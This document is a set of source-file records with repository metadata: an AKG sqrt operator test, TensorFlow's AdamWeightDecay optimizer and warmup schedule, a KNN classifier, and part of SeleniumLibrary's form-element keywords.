target_profiling(mod, *args_list, target=target_name, repeat_time=attrs["repeat_times"])
return input, output, expect, compare_tensor(output, expect, rtol=5e-03, equal_nan=True)
def gen_data(dtype, shape):
# Generate data for testing the op
input = random_gaussian(shape, miu=1, sigma=0.1).astype(dtype)
input = np.abs(input)
expect = np.sqrt(input)
output = np.full(expect.shape, np.nan, dtype)
return expect, input, output
| 43.45098 | 105 | 0.704874 |
import akg
import numpy as np
from akg.utils import kernel_exec as utils
from akg.ops.math import Sqrt
from tests.common.tensorio import compare_tensor
from tests.common.gen_random import random_gaussian
from akg.utils.result_analysis import target_profiling
from akg.utils.format_transform import to_tvm_nd_array
def sqrt_run(shape, dtype, attrs):
if 'tuning' in attrs.keys():
t = attrs.get("tuning", False)
kernel_name = attrs.get("kernel_name", False)
mod = utils.op_build_test(Sqrt, [shape], [dtype], kernel_name=kernel_name, attrs=attrs, tuning=t)
if t:
expect, input, output = gen_data(dtype, shape)
return mod, expect, (input, output)
else:
return mod
else:
expect, input, output = gen_data(dtype, shape)
mod = utils.op_build_test(Sqrt, [shape], [dtype], kernel_name='sqrt', attrs=attrs)
output = utils.mod_launch(mod, (input, output), expect=expect)
if attrs.get("profiling", False):
target_name = attrs["target"].split()[0]
args_list = to_tvm_nd_array([input, output], akg.tvm.context(target_name, 0))
target_profiling(mod, *args_list, target=target_name, repeat_time=attrs["repeat_times"])
return input, output, expect, compare_tensor(output, expect, rtol=5e-03, equal_nan=True)
def gen_data(dtype, shape):
input = random_gaussian(shape, miu=1, sigma=0.1).astype(dtype)
input = np.abs(input)
expect = np.sqrt(input)
output = np.full(expect.shape, np.nan, dtype)
return expect, input, output
| true | true |
f72338cabbb47dff386554f0d46e1799a3d64812 | 7,395 | py | Python | official/nlp/optimization.py | zcdzcdzcd/models | a31b526a7617a152a138a865b5689bf5b59f655d | [
"Apache-2.0"
] | 211 | 2019-10-21T14:58:43.000Z | 2022-03-11T12:01:41.000Z | official/nlp/optimization.py | zcdzcdzcd/models | a31b526a7617a152a138a865b5689bf5b59f655d | [
"Apache-2.0"
] | 18 | 2019-10-30T16:14:31.000Z | 2022-02-09T23:31:56.000Z | official/nlp/optimization.py | zcdzcdzcd/models | a31b526a7617a152a138a865b5689bf5b59f655d | [
"Apache-2.0"
] | 74 | 2019-10-25T13:57:51.000Z | 2022-02-04T03:56:10.000Z | # Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functions and classes related to optimization (weight updates)."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import re
import tensorflow as tf
class WarmUp(tf.keras.optimizers.schedules.LearningRateSchedule):
"""Applys a warmup schedule on a given learning rate decay schedule."""
def __init__(
self,
initial_learning_rate,
decay_schedule_fn,
warmup_steps,
power=1.0,
name=None):
super(WarmUp, self).__init__()
self.initial_learning_rate = initial_learning_rate
self.warmup_steps = warmup_steps
self.power = power
self.decay_schedule_fn = decay_schedule_fn
self.name = name
def __call__(self, step):
with tf.name_scope(self.name or 'WarmUp') as name:
# Implements polynomial warmup. i.e., if global_step < warmup_steps, the
# learning rate will be `global_step/num_warmup_steps * init_lr`.
global_step_float = tf.cast(step, tf.float32)
warmup_steps_float = tf.cast(self.warmup_steps, tf.float32)
warmup_percent_done = global_step_float / warmup_steps_float
warmup_learning_rate = (
self.initial_learning_rate *
tf.math.pow(warmup_percent_done, self.power))
return tf.cond(global_step_float < warmup_steps_float,
lambda: warmup_learning_rate,
lambda: self.decay_schedule_fn(step),
name=name)
def get_config(self):
return {
'initial_learning_rate': self.initial_learning_rate,
'decay_schedule_fn': self.decay_schedule_fn,
'warmup_steps': self.warmup_steps,
'power': self.power,
'name': self.name
}
def create_optimizer(init_lr, num_train_steps, num_warmup_steps):
"""Creates an optimizer with learning rate schedule."""
# Implements linear decay of the learning rate.
learning_rate_fn = tf.keras.optimizers.schedules.PolynomialDecay(
initial_learning_rate=init_lr,
decay_steps=num_train_steps,
end_learning_rate=0.0)
if num_warmup_steps:
learning_rate_fn = WarmUp(initial_learning_rate=init_lr,
decay_schedule_fn=learning_rate_fn,
warmup_steps=num_warmup_steps)
optimizer = AdamWeightDecay(
learning_rate=learning_rate_fn,
weight_decay_rate=0.01,
beta_1=0.9,
beta_2=0.999,
epsilon=1e-6,
exclude_from_weight_decay=['layer_norm', 'bias'])
return optimizer
class AdamWeightDecay(tf.keras.optimizers.Adam):
"""Adam enables L2 weight decay and clip_by_global_norm on gradients.
Just adding the square of the weights to the loss function is *not* the
correct way of using L2 regularization/weight decay with Adam, since that will
interact with the m and v parameters in strange ways.
Instead we want ot decay the weights in a manner that doesn't interact with
the m/v parameters. This is equivalent to adding the square of the weights to
the loss with plain (non-momentum) SGD.
"""
def __init__(self,
learning_rate=0.001,
beta_1=0.9,
beta_2=0.999,
epsilon=1e-7,
amsgrad=False,
weight_decay_rate=0.0,
include_in_weight_decay=None,
exclude_from_weight_decay=None,
name='AdamWeightDecay',
**kwargs):
super(AdamWeightDecay, self).__init__(
learning_rate, beta_1, beta_2, epsilon, amsgrad, name, **kwargs)
self.weight_decay_rate = weight_decay_rate
self._include_in_weight_decay = include_in_weight_decay
self._exclude_from_weight_decay = exclude_from_weight_decay
@classmethod
def from_config(cls, config):
"""Creates an optimizer from its config with WarmUp custom object."""
custom_objects = {'WarmUp': WarmUp}
return super(AdamWeightDecay, cls).from_config(
config, custom_objects=custom_objects)
def _prepare_local(self, var_device, var_dtype, apply_state):
super(AdamWeightDecay, self)._prepare_local(var_device, var_dtype,
apply_state)
apply_state['weight_decay_rate'] = tf.constant(
self.weight_decay_rate, name='adam_weight_decay_rate')
def _decay_weights_op(self, var, learning_rate, apply_state):
do_decay = self._do_use_weight_decay(var.name)
if do_decay:
return var.assign_sub(
learning_rate * var *
apply_state['weight_decay_rate'],
use_locking=self._use_locking)
return tf.no_op()
def apply_gradients(self, grads_and_vars, name=None):
grads, tvars = list(zip(*grads_and_vars))
(grads, _) = tf.clip_by_global_norm(grads, clip_norm=1.0)
return super(AdamWeightDecay, self).apply_gradients(zip(grads, tvars))
def _get_lr(self, var_device, var_dtype, apply_state):
"""Retrieves the learning rate with the given state."""
if apply_state is None:
return self._decayed_lr_t[var_dtype], {}
apply_state = apply_state or {}
coefficients = apply_state.get((var_device, var_dtype))
if coefficients is None:
coefficients = self._fallback_apply_state(var_device, var_dtype)
apply_state[(var_device, var_dtype)] = coefficients
return coefficients['lr_t'], dict(apply_state=apply_state)
def _resource_apply_dense(self, grad, var, apply_state=None):
lr_t, kwargs = self._get_lr(var.device, var.dtype.base_dtype, apply_state)
decay = self._decay_weights_op(var, lr_t, apply_state)
with tf.control_dependencies([decay]):
return super(AdamWeightDecay, self)._resource_apply_dense(
grad, var, **kwargs)
def _resource_apply_sparse(self, grad, var, indices, apply_state=None):
lr_t, kwargs = self._get_lr(var.device, var.dtype.base_dtype, apply_state)
decay = self._decay_weights_op(var, lr_t, apply_state)
with tf.control_dependencies([decay]):
return super(AdamWeightDecay, self)._resource_apply_sparse(
grad, var, indices, **kwargs)
def get_config(self):
config = super(AdamWeightDecay, self).get_config()
config.update({
'weight_decay_rate': self.weight_decay_rate,
})
return config
def _do_use_weight_decay(self, param_name):
"""Whether to use L2 weight decay for `param_name`."""
if self.weight_decay_rate == 0:
return False
if self._include_in_weight_decay:
for r in self._include_in_weight_decay:
if re.search(r, param_name) is not None:
return True
if self._exclude_from_weight_decay:
for r in self._exclude_from_weight_decay:
if re.search(r, param_name) is not None:
return False
return True
| 38.118557 | 80 | 0.692765 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import re
import tensorflow as tf
class WarmUp(tf.keras.optimizers.schedules.LearningRateSchedule):
def __init__(
self,
initial_learning_rate,
decay_schedule_fn,
warmup_steps,
power=1.0,
name=None):
super(WarmUp, self).__init__()
self.initial_learning_rate = initial_learning_rate
self.warmup_steps = warmup_steps
self.power = power
self.decay_schedule_fn = decay_schedule_fn
self.name = name
def __call__(self, step):
with tf.name_scope(self.name or 'WarmUp') as name:
global_step_float = tf.cast(step, tf.float32)
warmup_steps_float = tf.cast(self.warmup_steps, tf.float32)
warmup_percent_done = global_step_float / warmup_steps_float
warmup_learning_rate = (
self.initial_learning_rate *
tf.math.pow(warmup_percent_done, self.power))
return tf.cond(global_step_float < warmup_steps_float,
lambda: warmup_learning_rate,
lambda: self.decay_schedule_fn(step),
name=name)
def get_config(self):
return {
'initial_learning_rate': self.initial_learning_rate,
'decay_schedule_fn': self.decay_schedule_fn,
'warmup_steps': self.warmup_steps,
'power': self.power,
'name': self.name
}
def create_optimizer(init_lr, num_train_steps, num_warmup_steps):
learning_rate_fn = tf.keras.optimizers.schedules.PolynomialDecay(
initial_learning_rate=init_lr,
decay_steps=num_train_steps,
end_learning_rate=0.0)
if num_warmup_steps:
learning_rate_fn = WarmUp(initial_learning_rate=init_lr,
decay_schedule_fn=learning_rate_fn,
warmup_steps=num_warmup_steps)
optimizer = AdamWeightDecay(
learning_rate=learning_rate_fn,
weight_decay_rate=0.01,
beta_1=0.9,
beta_2=0.999,
epsilon=1e-6,
exclude_from_weight_decay=['layer_norm', 'bias'])
return optimizer
class AdamWeightDecay(tf.keras.optimizers.Adam):
def __init__(self,
learning_rate=0.001,
beta_1=0.9,
beta_2=0.999,
epsilon=1e-7,
amsgrad=False,
weight_decay_rate=0.0,
include_in_weight_decay=None,
exclude_from_weight_decay=None,
name='AdamWeightDecay',
**kwargs):
super(AdamWeightDecay, self).__init__(
learning_rate, beta_1, beta_2, epsilon, amsgrad, name, **kwargs)
self.weight_decay_rate = weight_decay_rate
self._include_in_weight_decay = include_in_weight_decay
self._exclude_from_weight_decay = exclude_from_weight_decay
@classmethod
def from_config(cls, config):
custom_objects = {'WarmUp': WarmUp}
return super(AdamWeightDecay, cls).from_config(
config, custom_objects=custom_objects)
def _prepare_local(self, var_device, var_dtype, apply_state):
super(AdamWeightDecay, self)._prepare_local(var_device, var_dtype,
apply_state)
apply_state['weight_decay_rate'] = tf.constant(
self.weight_decay_rate, name='adam_weight_decay_rate')
def _decay_weights_op(self, var, learning_rate, apply_state):
do_decay = self._do_use_weight_decay(var.name)
if do_decay:
return var.assign_sub(
learning_rate * var *
apply_state['weight_decay_rate'],
use_locking=self._use_locking)
return tf.no_op()
def apply_gradients(self, grads_and_vars, name=None):
grads, tvars = list(zip(*grads_and_vars))
(grads, _) = tf.clip_by_global_norm(grads, clip_norm=1.0)
return super(AdamWeightDecay, self).apply_gradients(zip(grads, tvars))
def _get_lr(self, var_device, var_dtype, apply_state):
if apply_state is None:
return self._decayed_lr_t[var_dtype], {}
apply_state = apply_state or {}
coefficients = apply_state.get((var_device, var_dtype))
if coefficients is None:
coefficients = self._fallback_apply_state(var_device, var_dtype)
apply_state[(var_device, var_dtype)] = coefficients
return coefficients['lr_t'], dict(apply_state=apply_state)
def _resource_apply_dense(self, grad, var, apply_state=None):
lr_t, kwargs = self._get_lr(var.device, var.dtype.base_dtype, apply_state)
decay = self._decay_weights_op(var, lr_t, apply_state)
with tf.control_dependencies([decay]):
return super(AdamWeightDecay, self)._resource_apply_dense(
grad, var, **kwargs)
def _resource_apply_sparse(self, grad, var, indices, apply_state=None):
lr_t, kwargs = self._get_lr(var.device, var.dtype.base_dtype, apply_state)
decay = self._decay_weights_op(var, lr_t, apply_state)
with tf.control_dependencies([decay]):
return super(AdamWeightDecay, self)._resource_apply_sparse(
grad, var, indices, **kwargs)
def get_config(self):
config = super(AdamWeightDecay, self).get_config()
config.update({
'weight_decay_rate': self.weight_decay_rate,
})
return config
def _do_use_weight_decay(self, param_name):
if self.weight_decay_rate == 0:
return False
if self._include_in_weight_decay:
for r in self._include_in_weight_decay:
if re.search(r, param_name) is not None:
return True
if self._exclude_from_weight_decay:
for r in self._exclude_from_weight_decay:
if re.search(r, param_name) is not None:
return False
return True
| true | true |
f72338dbcf9c735ce7afecb1af39a35d7ce5035f | 5,732 | py | Python | KNN.py | ffcccc/MachineLearning | 78bc9c5df08b14f5d70ad5d6774c74f85a585c7e | [
"Apache-2.0"
] | null | null | null | KNN.py | ffcccc/MachineLearning | 78bc9c5df08b14f5d70ad5d6774c74f85a585c7e | [
"Apache-2.0"
] | null | null | null | KNN.py | ffcccc/MachineLearning | 78bc9c5df08b14f5d70ad5d6774c74f85a585c7e | [
"Apache-2.0"
] | null | null | null | """
@Filename: KNN.py
@Author: Danc1elion
@Author: ffcccc
@Create Date: 2019-04-29
@Update Date: 2019-05-03
@Description: Implement of KNN
"""
import numpy as np
import operator as op
import AClassifier
import preProcess
class KNNClassifier(AClassifier.aClassifier):
def __init__(self, k, norm_type="Normalization"):
self.k = k
self.norm_type = "Normalization"
self.x_train = None
self.y_train = None
'''
Function: Normalization
Description: Normalize input data. For vector x, the normalization process is given by
normalization(x) = (x - min(x))/(max(x) - min(x))
Input: data dataType: ndarray description: input data
Output: norm_data dataType: ndarray description: output data after normalization
'''
# def Normalization(self, data):
# # get the max and min value of each column
# min_value = data.min(axis=0)
# max_value = data.max(axis=0)
# diff = max_value - min_value
# # normalization
# min_data = np.tile(min_value, (data.shape[0], 1))
# norm_data = (data - min_data)/np.tile(diff, (data.shape[0], 1))
# return norm_data
'''
Function: Standardization
Description: Standardize input data. For vector x, the normalization process is given by
Standardization(x) = x - mean(x)/std(x)
Input: data dataType: ndarray description: input data
Output: standard_data dataType: ndarray description: output data after standardization
'''
# def Standardization(self, data):
# # get the mean and the variance of each column
# mean_value = data.mean(axis=0)
# var_value = data.std(axis=0)
# standard_data = (data - np.tile(mean_value, (data.shape[0], 1)))/np.tile(var_value, (data.shape[0], 1))
# return standard_data
'''
Function: train
Description: train the model
Input: train_data dataType: ndarray description: features
test_data dataType: ndarray description: labels
Output: self dataType: obj description:
'''
def train(self, train_data, train_label):
if self.norm_type == "Standardization":
train_data = preProcess.Standardization(train_data)
else:
train_data = preProcess.Normalization(train_data)
self.x_train = train_data
self.y_train = train_label
return self
'''
Function: predict
Description: give the prediction for test data
Input: test_data dataType: ndarray description: data for testing
test_abel dataType: ndarray description: labels of train data
norm_type dataType: string description: type of normalization, default:Normalization
probability dataType: bool description: if true return label and probability, else return label only
showResult dataType: bool description: display the prediction result
Output: results dataType: ndarray description: label or probability
'''
def predict(self, test_data):
# Normalization
if self.norm_type == "Standardization":
testData = preProcess.Standardization(test_data)
else:
testData = preProcess.Normalization(test_data)
test_num = testData.shape[0]
prediction = np.zeros([test_num, 1])
probability = np.zeros([test_num, 1])
# predict each samples in test data
for i in range(test_num):
prediction[i], probability[i] = self.calculateDistance(testData[i], self.x_train, self.y_train, self.k)
self.prediction = prediction
self.probability = probability
return prediction
'''
Function: calculateDistance
Description: calcuate the distance between input vector and train data
Input: input dataType: ndarray description: input vector
traind_ata dataType: ndarray description: data for training
train_label dataType: ndarray description: labels of train data
k dataType: int description: select the first k distances
Output: prob dataType: float description: max probability of prediction
label dataType: int description: prediction label of input vector
'''
def calculateDistance(self, input, train_data, train_label, k):
train_num = train_data.shape[0]
# calcuate the distances
distances = np.tile(input, (train_num, 1)) - train_data
distances = distances**2
distances = distances.sum(axis=1)
distances = distances**0.5
# get the labels of the first k distances
disIndex = distances.argsort()
labelCount = {}
for i in range(k):
label = train_label[disIndex[i]]
labelCount[label] = labelCount.get(label, 0) + 1
prediction = sorted(labelCount.items(), key=op.itemgetter(1), reverse=True)
label = prediction[0][0]
prob = prediction[0][1]/k
return label, prob
'''
Function: showDetectionResult
Description: show detection result
Input: test_data dataType: ndarray description: data for test
test_label dataType: ndarray description: labels of test data
Output: accuracy dataType: float description: detection accuarcy
'''
# def showDetectionResult(self, test_data, test_label):
# test_label = np.expand_dims(test_label, axis=1)
# prediction = self.predict(test_data)
# accuarcy = sum(prediction == test_label)/len(test_label)
# return accuarcy
| 40.942857 | 118 | 0.63695 |
import numpy as np
import operator as op
import AClassifier
import preProcess
class KNNClassifier(AClassifier.aClassifier):
def __init__(self, k, norm_type="Normalization"):
self.k = k
self.norm_type = "Normalization"
self.x_train = None
self.y_train = None
in_label):
if self.norm_type == "Standardization":
train_data = preProcess.Standardization(train_data)
else:
train_data = preProcess.Normalization(train_data)
self.x_train = train_data
self.y_train = train_label
return self
def predict(self, test_data):
if self.norm_type == "Standardization":
testData = preProcess.Standardization(test_data)
else:
testData = preProcess.Normalization(test_data)
test_num = testData.shape[0]
prediction = np.zeros([test_num, 1])
probability = np.zeros([test_num, 1])
for i in range(test_num):
prediction[i], probability[i] = self.calculateDistance(testData[i], self.x_train, self.y_train, self.k)
self.prediction = prediction
self.probability = probability
return prediction
def calculateDistance(self, input, train_data, train_label, k):
train_num = train_data.shape[0]
distances = np.tile(input, (train_num, 1)) - train_data
distances = distances**2
distances = distances.sum(axis=1)
distances = distances**0.5
disIndex = distances.argsort()
labelCount = {}
for i in range(k):
label = train_label[disIndex[i]]
labelCount[label] = labelCount.get(label, 0) + 1
prediction = sorted(labelCount.items(), key=op.itemgetter(1), reverse=True)
label = prediction[0][0]
prob = prediction[0][1]/k
return label, prob
| true | true |
f723390bec450459c3d07d06d9a3faf905aa89d2 | 17,433 | py | Python | src/SeleniumLibrary/keywords/formelement.py | chandapriya13/SeleniumLibrary | a82bb7c9511f6bac573eaaabb2b1dad0035d369e | [
"ECL-2.0",
"Apache-2.0"
] | 4 | 2017-12-18T02:21:48.000Z | 2019-06-12T01:32:40.000Z | src/SeleniumLibrary/keywords/formelement.py | chandapriya13/SeleniumLibrary | a82bb7c9511f6bac573eaaabb2b1dad0035d369e | [
"ECL-2.0",
"Apache-2.0"
] | 5 | 2018-12-03T17:01:30.000Z | 2019-03-30T16:09:01.000Z | src/SeleniumLibrary/keywords/formelement.py | chandapriya13/SeleniumLibrary | a82bb7c9511f6bac573eaaabb2b1dad0035d369e | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2018-01-23T16:11:55.000Z | 2018-01-23T16:11:55.000Z | # Copyright 2008-2011 Nokia Networks
# Copyright 2011-2016 Ryan Tomac, Ed Manlove and contributors
# Copyright 2016- Robot Framework Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from SeleniumLibrary.base import LibraryComponent, keyword
from SeleniumLibrary.errors import ElementNotFound
from SeleniumLibrary.utils import is_noney, is_truthy
class FormElementKeywords(LibraryComponent):
@keyword
def submit_form(self, locator=None):
"""Submits a form identified by ``locator``.
If ``locator`` is not given, first form on the page is submitted.
See the `Locating elements` section for details about the locator
syntax.
"""
self.info("Submitting form '%s'." % locator)
if is_noney(locator):
locator = 'tag:form'
element = self.find_element(locator, tag='form')
element.submit()
@keyword
def checkbox_should_be_selected(self, locator):
"""Verifies checkbox ``locator`` is selected/checked.
See the `Locating elements` section for details about the locator
syntax.
"""
self.info("Verifying checkbox '%s' is selected." % locator)
element = self._get_checkbox(locator)
if not element.is_selected():
raise AssertionError("Checkbox '%s' should have been selected "
"but was not." % locator)
@keyword
def checkbox_should_not_be_selected(self, locator):
"""Verifies checkbox ``locator`` is not selected/checked.
See the `Locating elements` section for details about the locator
syntax..
"""
self.info("Verifying checkbox '%s' is not selected." % locator)
element = self._get_checkbox(locator)
if element.is_selected():
raise AssertionError("Checkbox '%s' should not have been "
"selected." % locator)
@keyword
def page_should_contain_checkbox(self, locator, message=None, loglevel='TRACE'):
"""Verifies checkbox ``locator`` is found from current page.
See `Page Should Contain Element` for explanation about ``message``
and ``loglevel`` arguments.
See the `Locating elements` section for details about the locator
syntax.
"""
self.assert_page_contains(locator, 'checkbox', message, loglevel)
@keyword
def page_should_not_contain_checkbox(self, locator, message=None, loglevel='TRACE'):
"""Verifies checkbox ``locator`` is not found from current page.
See `Page Should Contain Element` for explanation about ``message``
and ``loglevel`` arguments.
See the `Locating elements` section for details about the locator
syntax.
"""
self.assert_page_not_contains(locator, 'checkbox', message, loglevel)
@keyword
def select_checkbox(self, locator):
"""Selects checkbox identified by ``locator``.
Does nothing if checkbox is already selected.
See the `Locating elements` section for details about the locator
syntax.
"""
self.info("Selecting checkbox '%s'." % locator)
element = self._get_checkbox(locator)
if not element.is_selected():
element.click()
@keyword
def unselect_checkbox(self, locator):
"""Removes selection of checkbox identified by ``locator``.
Does nothing if the checkbox is not selected.
See the `Locating elements` section for details about the locator
syntax.
"""
self.info("Unselecting checkbox '%s'." % locator)
element = self._get_checkbox(locator)
if element.is_selected():
element.click()
@keyword
def page_should_contain_radio_button(self, locator, message=None, loglevel='TRACE'):
"""Verifies radio button ``locator`` is found from current page.
See `Page Should Contain Element` for explanation about ``message``
and ``loglevel`` arguments.
See the `Locating elements` section for details about the locator
syntax. When using the default locator strategy, radio buttons are
searched using ``id``, ``name`` and ``value``.
"""
self.assert_page_contains(locator, 'radio button', message, loglevel)
@keyword
def page_should_not_contain_radio_button(self, locator, message=None, loglevel='TRACE'):
"""Verifies radio button ``locator`` is not found from current page.
See `Page Should Contain Element` for explanation about ``message``
and ``loglevel`` arguments.
See the `Locating elements` section for details about the locator
syntax. When using the default locator strategy, radio buttons are
searched using ``id``, ``name`` and ``value``.
"""
self.assert_page_not_contains(locator, 'radio button', message,
loglevel)
@keyword
def radio_button_should_be_set_to(self, group_name, value):
"""Verifies radio button group ``group_name`` is set to ``value``.
``group_name`` is the ``name`` of the radio button group.
"""
self.info("Verifying radio button '%s' has selection '%s'."
% (group_name, value))
elements = self._get_radio_buttons(group_name)
actual_value = self._get_value_from_radio_buttons(elements)
if actual_value is None or actual_value != value:
raise AssertionError("Selection of radio button '%s' should have "
"been '%s' but was '%s'."
% (group_name, value, actual_value))
@keyword
def radio_button_should_not_be_selected(self, group_name):
"""Verifies radio button group ``group_name`` has no selection.
``group_name`` is the ``name`` of the radio button group.
"""
self.info("Verifying radio button '%s' has no selection." % group_name)
elements = self._get_radio_buttons(group_name)
actual_value = self._get_value_from_radio_buttons(elements)
if actual_value is not None:
raise AssertionError("Radio button group '%s' should not have "
"had selection, but '%s' was selected."
% (group_name, actual_value))
@keyword
def select_radio_button(self, group_name, value):
"""Sets radio button group ``group_name`` to ``value``.
The radio button to be selected is located by two arguments:
- ``group_name`` is the name of the radio button group.
- ``value`` is the ``id`` or ``value`` attribute of the actual
radio button.
Examples:
| `Select Radio Button` | size | XL |
| `Select Radio Button` | contact | email |
"""
self.info("Selecting '%s' from radio button '%s'."
% (value, group_name))
element = self._get_radio_button_with_value(group_name, value)
if not element.is_selected():
element.click()
@keyword
def choose_file(self, locator, file_path):
"""Inputs the ``file_path`` into file input field ``locator``.
This keyword is most often used to input files into upload forms.
The file specified with ``file_path`` must be available on machine
where tests are executed. When using Selenium Grid, Seleniun will,
[https://seleniumhq.github.io/selenium/docs/api/py/webdriver_remote/selenium.webdriver.remote.command.html?highlight=upload#selenium.webdriver.remote.command.Command.UPLOAD_FILE|magically],
transfer the file from the machine where test are executed
to the Selenium Grid node where the browser is running.
Then Selenium will send the file path, from to node file
system, to the browser.
Example:
| `Choose File` | my_upload_field | ${CURDIR}/trades.csv |
"""
if not os.path.isfile(file_path):
raise ValueError("File '%s' does not exist on the local file "
"system." % file_path)
self.find_element(locator).send_keys(file_path)
@keyword
def input_password(self, locator, password, clear=True):
"""Types the given password into text field identified by ``locator``.
See the `Locating elements` section for details about the locator
syntax. See `Input Text` for ``clear`` argument details.
Difference compared to `Input Text` is that this keyword does not
log the given password on the INFO level. Notice that if you use
the keyword like
| Input Password | password_field | password |
the password is shown as a normal keyword argument. A way to avoid
that is using variables like
| Input Password | password_field | ${PASSWORD} |
Notice also that SeleniumLibrary logs all the communication with
browser drivers using the DEBUG level, and the actual password can
be seen there. Additionally Robot Framework logs all arguments using
the TRACE level. Tests must thus not be executed using level below
INFO if password should not be logged in any format.
The `clear` argument is new in SeleniumLibrary 4.0
"""
self.info("Typing password into text field '%s'." % locator)
self._input_text_into_text_field(locator, password, clear)
@keyword
def input_text(self, locator, text, clear=True):
"""Types the given ``text`` into text field identified by ``locator``.
When ``clear`` is true, the input element is cleared before
text is typed to the element. When false, the previous text
is not cleared from the element. Use `Input Password` if you
do not want the given ``text`` to be logged.
See the `Locating elements` section for details about the locator
syntax. See the `Boolean arguments` section how Boolean values are
handled.
The `clear` argument is new in SeleniumLibrary 4.0
"""
self.info("Typing text '%s' into text field '%s'." % (text, locator))
self._input_text_into_text_field(locator, text, clear)
@keyword
def page_should_contain_textfield(self, locator, message=None, loglevel='TRACE'):
"""Verifies text field ``locator`` is found from current page.
See `Page Should Contain Element` for explanation about ``message``
and ``loglevel`` arguments.
See the `Locating elements` section for details about the locator
syntax.
"""
self.assert_page_contains(locator, 'text field', message, loglevel)
@keyword
def page_should_not_contain_textfield(self, locator, message=None, loglevel='TRACE'):
"""Verifies text field ``locator`` is not found from current page.
See `Page Should Contain Element` for explanation about ``message``
and ``loglevel`` arguments.
See the `Locating elements` section for details about the locator
syntax.
"""
self.assert_page_not_contains(locator, 'text field', message, loglevel)
@keyword
def textfield_should_contain(self, locator, expected, message=None):
"""Verifies text field ``locator`` contains text ``expected``.
``message`` can be used to override the default error message.
See the `Locating elements` section for details about the locator
syntax.
"""
actual = self._get_value(locator, 'text field')
if expected not in actual:
if is_noney(message):
message = "Text field '%s' should have contained text '%s' "\
"but it contained '%s'." % (locator, expected, actual)
raise AssertionError(message)
self.info("Text field '%s' contains text '%s'." % (locator, expected))
@keyword
def textfield_value_should_be(self, locator, expected, message=None):
"""Verifies text field ``locator`` has exactly text ``expected``.
``message`` can be used to override default error message.
See the `Locating elements` section for details about the locator
syntax.
"""
actual = self._get_value(locator, 'text field')
if actual != expected:
if is_noney(message):
message = "Value of text field '%s' should have been '%s' "\
"but was '%s'." % (locator, expected, actual)
raise AssertionError(message)
self.info("Content of text field '%s' is '%s'." % (locator, expected))
@keyword
def textarea_should_contain(self, locator, expected, message=None):
"""Verifies text area ``locator`` contains text ``expected``.
``message`` can be used to override default error message.
See the `Locating elements` section for details about the locator
syntax.
"""
actual = self._get_value(locator, 'text area')
if expected not in actual:
if is_noney(message):
message = "Text area '%s' should have contained text '%s' " \
"but it had '%s'." % (locator, expected, actual)
raise AssertionError(message)
self.info("Text area '%s' contains text '%s'." % (locator, expected))
@keyword
def textarea_value_should_be(self, locator, expected, message=None):
"""Verifies text area ``locator`` has exactly text ``expected``.
``message`` can be used to override default error message.
See the `Locating elements` section for details about the locator
syntax.
"""
actual = self._get_value(locator, 'text area')
if expected != actual:
if is_noney(message):
message = "Text area '%s' should have had text '%s' " \
"but it had '%s'." % (locator, expected, actual)
raise AssertionError(message)
self.info("Content of text area '%s' is '%s'." % (locator, expected))
@keyword
def page_should_contain_button(self, locator, message=None, loglevel='TRACE'):
"""Verifies button ``locator`` is found from current page.
See `Page Should Contain Element` for explanation about ``message``
and ``loglevel`` arguments.
See the `Locating elements` section for details about the locator
syntax. When using the default locator strategy, buttons are
searched using ``id``, ``name`` and ``value``.
"""
try:
self.assert_page_contains(locator, 'input', message, loglevel)
except AssertionError:
self.assert_page_contains(locator, 'button', message, loglevel)
@keyword
def page_should_not_contain_button(self, locator, message=None, loglevel='TRACE'):
"""Verifies button ``locator`` is not found from current page.
See `Page Should Contain Element` for explanation about ``message``
and ``loglevel`` arguments.
See the `Locating elements` section for details about the locator
syntax. When using the default locator strategy, buttons are
searched using ``id``, ``name`` and ``value``.
"""
self.assert_page_not_contains(locator, 'button', message, loglevel)
self.assert_page_not_contains(locator, 'input', message, loglevel)
def _get_value(self, locator, tag):
return self.find_element(locator, tag).get_attribute('value')
def _get_checkbox(self, locator):
return self.find_element(locator, tag='checkbox')
def _get_radio_buttons(self, group_name):
xpath = "xpath://input[@type='radio' and @name='%s']" % group_name
self.debug('Radio group locator: ' + xpath)
elements = self.find_elements(xpath)
if not elements:
raise ElementNotFound("No radio button with name '%s' found."
% group_name)
return elements
def _get_radio_button_with_value(self, group_name, value):
xpath = "xpath://input[@type='radio' and @name='%s' and " \
"(@value='%s' or @id='%s')]" % (group_name, value, value)
self.debug('Radio group locator: ' + xpath)
try:
return self.find_element(xpath)
except ElementNotFound:
raise ElementNotFound("No radio button with name '%s' and "
"value '%s' found." % (group_name, value))
def _get_value_from_radio_buttons(self, elements):
for element in elements:
if element.is_selected():
return element.get_attribute('value')
return None
def _input_text_into_text_field(self, locator, text, clear):
element = self.find_element(locator)
if is_truthy(clear):
element.clear()
element.send_keys(text)
| 41.507143 | 197 | 0.634601 |
import os
from SeleniumLibrary.base import LibraryComponent, keyword
from SeleniumLibrary.errors import ElementNotFound
from SeleniumLibrary.utils import is_noney, is_truthy
class FormElementKeywords(LibraryComponent):
@keyword
def submit_form(self, locator=None):
self.info("Submitting form '%s'." % locator)
if is_noney(locator):
locator = 'tag:form'
element = self.find_element(locator, tag='form')
element.submit()
@keyword
def checkbox_should_be_selected(self, locator):
self.info("Verifying checkbox '%s' is selected." % locator)
element = self._get_checkbox(locator)
if not element.is_selected():
raise AssertionError("Checkbox '%s' should have been selected "
"but was not." % locator)
@keyword
def checkbox_should_not_be_selected(self, locator):
self.info("Verifying checkbox '%s' is not selected." % locator)
element = self._get_checkbox(locator)
